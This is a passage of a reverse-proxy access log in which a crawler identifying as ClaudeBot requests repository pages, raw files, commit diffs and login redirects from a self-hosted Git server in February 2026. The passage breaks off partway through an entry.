"/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 216.73.216.188] [Length 11234] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx?display=source" [Client 216.73.216.188] [Length 16486] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?display=source" [Client 216.73.216.188] [Length 24376] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13940] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents%2FHeader.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9787] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fcommits%2Fbranch%2Fmain%2FOpcUaMinimal%2FTestService%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2Fassets%2Fjs" [Client 216.73.216.188] [Length 23302] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11365] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16508] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10914] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13961] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 1422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup" [Client 216.73.216.188] [Length 11442] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp%2Ffetcher.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 10062] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fstatic%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 216.73.216.188] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14693] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fjs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4844] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-eol" [Client 216.73.216.188] [Length 77437] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 77427] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=show-all" [Client 216.73.216.188] [Length 77672] [Gzip 10.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 77477] [Gzip 10.52] [Sent-to 